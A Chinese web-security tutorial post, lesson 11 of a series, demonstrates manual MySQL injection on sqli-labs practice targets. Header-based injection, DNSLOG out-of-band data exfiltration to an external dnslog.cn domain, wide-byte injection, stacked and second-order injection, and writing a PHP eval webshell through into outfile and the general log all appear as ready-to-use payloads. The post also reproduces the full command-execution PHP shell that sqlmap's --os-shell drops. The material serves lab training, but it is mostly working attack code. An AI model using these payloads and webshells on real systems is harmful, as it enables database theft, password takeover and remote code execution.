网络安全进阶学习第十一课——MySQL手工注入(2)

这篇具有很好参考价值的文章主要介绍了网络安全进阶学习第十一课——MySQL手工注入(2)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。


一、UA注入

UA是用户代理(User-Agent)的缩写,里面含有客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。

1、原理

一些网站常常通过判断 UA 来给不同的操作系统、不同的浏览器发送不同的页面,因此可能造成某些页面无法在某个浏览器中正常显示。此时就有可能存在UA 头注入,一般会把数据插入到某张表中所以可以用报错注入
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

2、靶场演示:

1)一旦页面出现如下现状,就可以使用UA注入

网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
页面上会对浏览器的版本进行辨别

2)BP抓包

正常情况
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

在UA添加单引号,引发报错
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

3)修改User-Agent

构造的POC,获取数据库名:
1' and updatexml(1,concat(0x7e,database()),1) and '
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
由于不知道是多少个参数,所以前面的单引号是用来闭合前面的,后面的单引号是用来闭合后面的,这里不能使用#来对后面的参数进行省略。

后续获取其他数据的方法和上一节的联合注入大同小异。


二、referer注入

1、原理

报文中referer就是你的浏览器需要告诉服务器你是从哪个地方访问服务器的(来源),大部分网站或者app都会写入数据库用来分析量从哪里来,以及统计广告投入的成本,一般会把数据插入到某张表中所以可以用报错注入
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

2、靶场演示:

网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
这个靶场会记录来源的IP地址

1)使用BP抓包

正确输入的包
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

发生报错的数据包
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

2)修改Referer

构造的POC,获取数据库名:
’ and updatexml(1,concat(0x7e,database()),1) and ’
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

由于不知道是多少个参数,所以前面的单引号是用来闭合前面的,后面的单引号是用来闭合后面的,这里不能使用 # 来对后面的参数进行省略。

后续获取其他数据的方法和上一节的联合注入大同小异。


三、DNSLOG外带

1、使用场景

通常我们面对SQL注入过程中没有回显的情况下,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。

我们输入域名之后 我们的本地域名服务器会把在自身服务器里面查询是否存在ip地址 如果没有则发送到根域名服务器 如果根域名服务器里面有对应的记录则返回 如果没有则告诉本地域名服务器去向顶级域名服务器查找。

2、DNS

dns在解析的时候会留下记录。
简单来说,当dns服务器是我们自己的时,我们就可以通过查看日志来查询一些信息。
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

3、注入所需条件

  • 1、dns带外查询属于MySQL注入,在MySQL中有个系统属性
    secure_file_priv特性,该属性值必须为空(等于号后面没有任何内容)。

  • 2、使用LOAD_FILE()函数:LOAD_FILE()函数读取一个文件并将其内容作为字符串返回。
    语法为:load_file(file_name),其中file_name是文件的完整路径

  • 3、所以需要root权限,并且服务器要为Windows操作系统

4、使用方法

将dnslog平台中的特有字段payload带入目标发起dns请求,通过dns解析将请求后的关键信息组合成新的三级域名带出,在ns服务器的dns日志中显示出来。

5、靶场演示:

1)生成一个DNS域名

先在DNSlog平台上随机生成一个本地IP的DNS域名:
29lrdw.dnslog.cn
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

本地ping一下该DNS域名的随机子域名:
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

这里我随机输入的asd就成功带出来了。
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

2)开启MySQL中的secure_file_priv属性

网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
然后重启MySQL

3)使用BP进行操作

利用注入语句获取数据库名,使用的POC:
http:// 192.168.50.137:9006/Less-1/?id=1'+and+(select+load_file(concat('\\\\',(select+database()),'.29lrdw.dnslog.cn/qwe')))--+
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

返回DNSLOG页面查看
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
这里就把数据库名给带出来了

获取当前用户名,使用的POC:
http:// 192.168.50.137:9006/Less-1/?id=1'+and+(select+load_file(concat('\\\\',(select+ hex(user())),'.29lrdw.dnslog.cn/qwe')))--+
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

返回DNSLOG页面查看
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

使用hex解码
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

这样字就成功获得当前的用户名了。

4)为什么要对查询的内容进行hex编码

如果我们要查询的用户名中存在特殊字符:如!@#$%^&。最后在请求DNS服务器时变成:!@#$%^&*. 29lrdw.dnslog.cn。存在特殊字符的域名无法解析。因此在DNS日志中也找不到我们查询的数据。因此需要编码后进行查询,例如上述的用户名是root@localhost,存在特殊字符@,这个是无法DNS服务器是无法解析的,这就需要hex编码后查询出结果再解码。

在我们查询时,当不确定查询结果是否存在特殊字符时,最好先将其hex编码后再带入查询。


四、cookie注入

1、注入的原理

对get传递来的参数进行了过滤,但是忽略了cookie也可以传递参数。
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数以cookie方式提交,而一般的注入我们是使用get或者post方式提交。
(get方式提交就是直接在网址后面加上需要注入的语句,post则是通过表单方式,get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。)

cookie注入:修改自身cookie , 后台获取到这个cookie后 , 会直接拿去数据库里面进行比较 , 比较的时候就有可能注入。
注意:该注入一般可以联合XSS攻击一起使用

2、靶场演示:

1)通过BP抓包下面的情况就存在cookie注入

网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

2)寻找注入点,使用单引号测试

网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
在cookie后面的admin添加一个单引号出现报错,那么,这里就存在注入

3)构造POC注入

Cookie: uname=admin' and updatexml(1,concat(0x7e,database()),1) #
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
注意上面的POC是使用#来忽略后面的内容,而不是使用 - -


五、宽字节注入

1、注入原理

数据库使用GBK编码的时候,会将两个字符合并成一个中文。特殊值字符如单引号都会被转义。如: ' -> \' (%27 -> %5c%27)
这时我们就可以在单引号( ' )前面添加一个随机的GBK编码,例如:%df,该编码会把斜杠( \ )吃掉,从而把后面的单引号( ’ )解放出来,%df%27在GBK编码中会变成%df%5c%27,这时候%df%5c会合并成一个汉字,剩下的%27( ' )就被独立解放出来了。

2、靶场演示:

1)下面这种情况就存在宽字节注入

网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
添加一个',会自动添加\转义这种方法来进行过滤。

2)构造POC注入

http:// 192.168.43.110:9006/Less-32/?id=-1%df%27 union select 1,database(),user()--+
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
这样子就把数据库名和用户名获取到了。

注:这里是假设已经知道了该表只有3列的前提,具体前置过程可以参数前面的联合注入。


六、堆叠注入

1、注入原理

在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。

2、联合注入和堆叠注入的区别

区别就在于union 或者union all执行的语句类型是有限的,联合注入用来执行查询语句,而堆叠注入可以执行的是任意的语句

3、靶场模拟:

如下图构造POC:
http:// 192.168.43.110:9006/ /Less-38/?id=1'; insert into users(id,username,password)values(100,'kkkddd','kkkddd')--+
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

接着返回靶场查看数据库
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
这样子就把创建用户的MySql命令注入成功了。


七、二次注入

1、注入原理

输入的内容会被转换成字符串形式存储到数据库,从而会使得无法执行。那么我们就可以先把POC存储进数据库,然后把存在数据里面的POC调取出来执行,从而达到注入的效果。

一般情况下,账户名是不允许输入 # @ \ ’ 等特殊符号的,但可以做一个尝试,假如真的尝试出来了,那就可以尝试进行二次注入了。

2、使用场景

在知道某个账号名的存在,而想修改该账号对应的密码。例如我知道存在一个账号叫:admin,然后我就创建一个账号叫:admin'#,同时修改 admin’# 账号的密码,从而达到修改 admin 的密码。

3、靶场举例:

1)下面例子存在二次注入

这里利用admin账号

网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
正常登录,我返回的数据包长度是265

网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
上面无论我在login_user后面添加一个单引号还是两个单引号,或者其他字符,都会发生报错,也就是说输入的内容会全部变换成字符串形式来进行存储、查询。

2)创建一个新的账号

新账号名:admin'#
新账号密码:123456
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
登录成功。

3)修改新账号的密码

账号名:admin'#
新账号密码:111111
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

4)退出后再次登录查看结果

尝试登录admin'#账号,发现新改的密码:111111无法登录,还是得使用原来得旧密码123456。

尝试登录admin账号,发现原来的密码:admin无法登录,密码变成了:111111。

5)语句讲解:

这里是使用了下面的SQL语句:
UPDATE users SET PASSWORD=’111111’ where username='admin'#' and password=’123456’;

这里不难看出,调用时#后面的内容时全部忽略的,变成:
UPDATE users SET PASSWORD=’111111’ where username='admin'

原本时修改admin'#账号,就变成修改admin账号了。


八、GETSHELL

1、利用SQL注入获取MYSQL数据库权限的条件

  • 1)root用户最高权限
  • 2)知道网站的绝对路径
  • 3)secure_file_priv=为空或者在网站的根目录下

2、文件读写注入的原理

就是利用文件的读写权限进行注入,它可以写入一句话木马,也可以读取系统文件的敏感信息。

3、文件读写注入的条件

高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限

4、secure_file_priv选项

  • 1)secure_file_priv=
    代表对文件读写没有限制

  • 2)secure_file_priv=NULL
    代表不能进行文件读写

  • 3)secure_file_priv=d :/phpstudy /mysql/data
    代表只能对该路径下文件进行读写

命令:
show global variables like '%secure%'
#查看mysql全局变量的配置

5、常见网站的绝对路径

  • 1)Windows常见
    网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

  • 2)Linux常见
    网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

6、路径获取常见方式

报错显示,遗留文件,漏洞报错,平台配置文件等

7、读取文件

1)使用的函数

使用load_file()读取文件

2)路径注意点

路径不能使用反斜杠(\)。可以使用斜杠(/)双反斜杠(\\)0x,char转换的字符

3)一般使用联合注入来一起使用

4)靶场演示

  • 4.1、在靶机创建文件
    在C:\phpstudy_pro\WWW\sqli-labs-master目录下建立一个文件名1.txt,内容是:i am 1.txt
    网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

  • 4.2、构造POC读取文件
    在靶场使用SQL注入读取文件,POC是:
    http://192.168.1.104:9006/Less-2/?id=-1 union select 1,load_file('C:/phpstudy_pro/WWW/sqli-labs-master/1.txt'),3–+
    网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

同理,该方法可以读取到任意的文件。一般实战中我们可以使用这种方法来读取网站的配置文件和日志文件。

注意:上面的路径不能使用反斜杠(\),只能使用斜杠(/)和双反斜杠(\\)。

8、写入文件

1)使用的函数

使用函数 into outfile(能写入多行,按格式输出)和 into Dumpfile(只能写入一行,且没有脏数据)

2)outfile函数注意点

outfile后面本能接0x开头或者char转换以后的路径,只能是单引号路径

3)靶场演示:

3.1、构造POC写入文件

现在要在C:\phpstudy_pro\WWW\sqli-labs-master目录下创建一个文件3.txt,并写入内容,POC是:
http://192.168.1.104:9006/Less-2/?id=-1 union select 1,‘helloword’,3 into outfile 'C:/phpstudy_pro/WWW/sqli-labs-master/3.txt'--+
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

现在去写入目录查看
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
这里就把查询的内容全部都写入了。

注意:假如写入的文件名已经存在,是会写入失败的。

3.2、尝试写入shell

构造的POC:
http://192.168.1.104:9006/Less-2/?id=-1 union select 1,'<?php%20@eval($_POST[\'x\']);?>',3 into outfile 'C:/phpstudy_pro/WWW/sqli-labs-master/4.php'--+

使用shell工具尝试连接:
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
连接成功。

返回查看写入文件:
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

3.3、into outfile 和 into Dumpfile的区别

  • into outfile无论怎样写入都会存在空格等脏数据
  • into Dumpfile会自动清楚空格等脏数据

如上面例子只想留下单纯的php文本,而不想要其他脏文本,就可以使用into Dumpfile,并且把1、3等字符换成‘’(两个单引号的空字符)


九、日志GETSHELL

1、前提条件:

  • 1、知道网站的绝对路径
  • 2、网站存在堆叠注入
  • 3、拥有root权限

2、具体步骤:

  • 1、查询日志路径:show variables like ‘%general%’;
  • 2、开启日志:set global general_log = on; 这个默认时关闭的;
  • 3、设置日志路径:set global general_log_file = ‘D:\phpstudy_pro\WWW\shell.php’;
  • 4、随便把shell命令写入到日志中,然后使用工具连接shell

3、靶场演示(已知存在堆叠注入):

1)先查看靶场是否开启了日志:

show variables like ‘%general%’;
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
这里默认是关闭的。

2)使用堆叠注入开启日志

set global general_log = on;
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

再返回靶场查看是否已开启:
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
这里显示已经开启了。

3)使用堆叠注入修改日志的路径

set global general_log_file = ‘D:\phpstudy_pro\WWW\shell.php’;
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

返回靶场查看
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
明显日志路径已经改了。

4、随便在URL构造shell让他记录进日志
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

返回查看日志
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习
这样子shell就成功写入到日志里面了。


十、–os-shell(sqlmap)

1、原理

–os-shell就是使用 udf 提权获取WebShell。也是通过 into oufile 向服务器写入两个文件,一个可以直接执行系统命令,一个进行上传文件

此为sqlmap的一个命令

2、利用–os-shell命令的先决条件

  • 1、要求为DBA,–is-dba(phpstudy搭建的一般为DBA)
  • 2、secure_file_priv没有具体值
  • 3、知道网站的绝对路径
  • 4、GPC为off,php主动转义的功能关闭

3、靶场演示:

sqlmap -u http://192.168.43.145/2_Shotting_Range/sql/Less-1/?id=1 --os-shell
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

sqlmap 在指定的目录生成了两个文件(文件名是随机的,并不是固定的),这里就生成了如下两个文件:

  • tmpbeewq.php 用来执行系统命令
  • tmpuqvgw.php 用来上传文件

网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

3.1、用来执行系统命令文件

tmpbeewq.php的文件内容为:

<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set("max_execution_time",0);$z=@ini_get("disable_functions");if(!empty($z)){$z=preg_replace("/[, ]+/",',',$z);$z=explode(',',$z);$z=array_map("trim",$z);}else{$z=array();}$c=$c." 2>&1\n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f("system")){ob_start();system($c);$w=ob_get_clean();}elseif(f("proc_open")){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f("shell_exec")){$w=shell_exec($c);}elseif(f("passthru")){ob_start();passthru($c);$w=ob_get_clean();}elseif(f("popen")){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f("exec")){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}echo"<pre>$w</pre>";?>

尝试执行系统命令:
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习

3.2、上传文件的文件

使用tmpuqvgw.php上传文件

我们上传一个php的一句话后门
网络安全进阶学习第十一课——MySQL手工注入(2),web安全,web安全,学习文章来源地址https://www.toymoban.com/news/detail-627622.html


到了这里,关于网络安全进阶学习第十一课——MySQL手工注入(2)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全进阶学习第十四课——MSSQL注入

    强类型数据库,会把数字和字符严格区分的。 有四个默认的数据库: 1、master (重点) 保存着SQL Server实例的配置、权限、数据库定义和其他需要的信息。 2、model 模板数据库。每当创建一个新的数据库(包括系统数据库的TempDB),会创建一个以 Model 数据库为副本数据库,并

    2024年02月14日
    浏览(51)
  • 网络安全进阶学习第十五课——Oracle SQL注入

    Oracle数据库系统是世界上流行的关系数据库管理系统,系统可移植性好、使用方便、功能强,适用于各类大、中、小微机环境。它是一种高效率的、可靠性好的、适应高吞吐量的数据库方案。 Oracle服务默认端口:1521 Oracle和MySQL数据库语法大致相同,结构不太相同。 最大的一

    2024年02月11日
    浏览(44)
  • 网络安全进阶学习第十三课——SQL注入Bypass姿势

    1、like,rlike语句,其中rlike是正则 2、大于号,小于号 3、符号:为不等于的意思相当于!= 4、采用regexp函数 5、in 6、between 1、 substring、substrB 2、 locate(str1,str2) 返回str1字符串在str2里第一次出现的位置,没有则返回0; locate(str1,str2, pos ) 返回str1字符串在str2里pos(起始位置)出现

    2024年02月13日
    浏览(49)
  • 网络安全进阶学习第十二课——SQL手工注入3(Access数据库)

    判断数据库类型 —— 判断表名 —— 判断列名 —— 判断列名长度 —— 查出数据。 asp的网站,常用数据库为access、sqlserver。 and exsits (select * from msysobjects)0 access and exsits (select * from sysobjects)0 sqlserver 上述语句 会返回1或者0 。 msysobjects是access的默认数据库 , sysobjects是sqlserv

    2024年02月11日
    浏览(55)
  • 机器学习第十一课--K-Means聚类

    K-Means算法是最经典的聚类算法,几乎所有的聚类分析场景,你都可以使用K-Means,而且在营销场景上,它就是\\\"King\\\",所以不管从事数据分析师甚至是AI工程师,不知道K-Means是”不可原谅“的一件事情。在面试中,面试官也经常问关于K-Means的问题。虽然算法简单,但也有一些需

    2024年02月07日
    浏览(38)
  • 网络安全入门学习第十课——DNS欺骗

    域名系统(英文:Domain Name System,缩写:DNS) 是互联网的一项服务。 作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。DNS使用TCP和UDP端口53。 我们本地的计算机在接入网络的时候,都会自动分配一个DNS服务器的IP地址,这个DNS服务器叫做本地

    2024年02月06日
    浏览(51)
  • 网络安全入门学习第十七课——PHP数组

    索引数组是指 键名为整数 的数组。 默认 情况下,索引数组的 键名是从0开始 ,并依次递增。它主要适用于利用位置(0、1、2……)来标识数组元素的情况。另外,索引数组的键名也可以自己指定。 关联数组是指 键名为字符串 的数组。通常情况下,关联数组元素的“键”和

    2024年02月09日
    浏览(55)
  • 网络安全入门学习第十七课——PHP表单交互

    表单的主要功能:就是在网页上用于输入信息的区域,收集用户输入的信息,并将其提交给后端的服务器进行处理,实现用户与服务器的交互。 例如:购物结算、信息搜索等都是通过表单实现的。 一个完整的表单是由表单域和表单控件组成的。其中,表单域由form标记定义,

    2024年02月12日
    浏览(49)
  • <网络安全>《35 网络攻防专业课<第一课 - 网络攻防准备>》

    认识黑客 认识端口 常见术语与命令 网络攻击流程 VMWare虚拟环境靶机搭建 白帽黑客 是指有能力破坏电脑安全但不具恶意目的黑客。 灰帽黑客 是指对于伦理和法律态度不明的黑客。 黑帽黑客 经常用于区别于一般(正面的)理性黑客,一个犯罪和黑客的合成词。 黑客:Hack

    2024年02月19日
    浏览(61)
  • 网络安全进阶学习第八课——信息收集

    信息收集(Information Gathering)信息收集是指通过各种方式获取所需要的信息。渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。 目标资产信息搜集的程度,决定渗透过程的复杂程度。 目标主机信息搜集的深度,决定后渗透权限持续把控。 收集信

    2024年02月13日
    浏览(49)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包